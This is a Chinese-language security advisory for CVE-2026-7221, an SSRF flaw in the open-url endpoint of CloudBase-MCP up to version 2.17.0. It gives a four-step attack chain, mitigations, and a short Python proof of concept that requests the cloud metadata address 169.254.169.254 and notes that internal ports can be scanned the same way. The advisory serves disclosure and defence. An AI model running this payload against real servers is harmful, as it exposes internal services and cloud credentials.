IPBUF安全漏洞报告
English
CVE-2026-7221 CVSS 7.3 高危

CVE-2026-7221: CloudBase-MCP 服务端请求伪造漏洞

披露日期: 2026-04-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7221
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
TencentCloudBase CloudBase-MCP

相关标签

SSRFCVE-2026-7221TencentCloudBaseCloudBase-MCPRCEServer-Side Request Forgery

漏洞概述

TencentCloudBase CloudBase-MCP 在 2.17.0 及之前的版本中存在一个服务端请求伪造(SSRF)漏洞。该漏洞源于组件 open-url API 端点的 openUrl 函数,具体位于 mcp/src/interactive-server.ts 文件中。由于对参数 req.body.url 缺乏严格的验证,攻击者可以通过操控该参数发起远程攻击。成功的利用可能导致机密性、完整性和可用性的低程度影响。目前官方已发布补丁,建议用户尽快升级。

技术细节

该漏洞位于 `mcp/src/interactive-server.ts` 文件的 `openUrl` 函数中,对应的是 `open-url` API 接口。根本原因在于该接口在处理用户传入的 `req.body.url` 参数时,未实施有效的过滤、校验或白名单机制。这使得未经身份验证的远程攻击者能够构造恶意的 URL 请求。当服务器端代码处理该请求时,会代替攻击者向目标地址发起请求,从而形成 SSRF(服务端请求伪造)。攻击者可以利用此特性扫描内网端口、访问本地元数据服务(如云厂商的 169.254.169.254)或对内部受限服务发起攻击。由于 CVSS 向量显示无需用户交互且无需权限(PR:N),该漏洞利用门槛较低,危害主要在于内网信息泄露和作为内网渗透的跳板。

攻击链分析

STEP 1
侦察与发现
攻击者发现目标运行 TencentCloudBase CloudBase-MCP 版本小于等于 2.17.0,并识别出 open-url API 接口。
STEP 2
构造恶意请求
攻击者向 `open-url` 端点发送 POST 请求,在 `req.body.url` 参数中填入内部网络地址(如 127.0.0.1 或云元数据服务地址)。
STEP 3
服务端请求伪造
由于服务器未验证 URL 的合法性,服务器代替攻击者向内网目标发起 HTTP 请求。
STEP 4
信息泄露与利用
攻击者根据服务器的响应内容,获取内网敏感信息、凭证或进一步探测内网拓扑。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable CloudBase-MCP open-url endpoint target_url = "http://vulnerable-host:port/open-url" # Malicious payload to read internal metadata (common SSRF test) # Attackers can change this to scan internal ports like http://127.0.0.1:22 payload = { "url": "http://169.254.169.254/latest/meta-data/" } try: # Sending the POST request with the malicious body response = requests.post(target_url, json=payload) # Check if the request was successful if response.status_code == 200: print("[+] Exploit successful! Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

TencentCloudBase CloudBase-MCP <= 2.17.0

防御指南

临时缓解措施
如果无法立即升级,建议通过网络策略(如防火墙或安全组)限制受影响服务器的出站流量,禁止其访问非业务必需的内网段和公网地址。同时,可在应用层(WAF)拦截对 open-url 接口包含内网IP(如 127.0.0.1, 192.168.x.x, 10.x.x.x)的请求参数。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表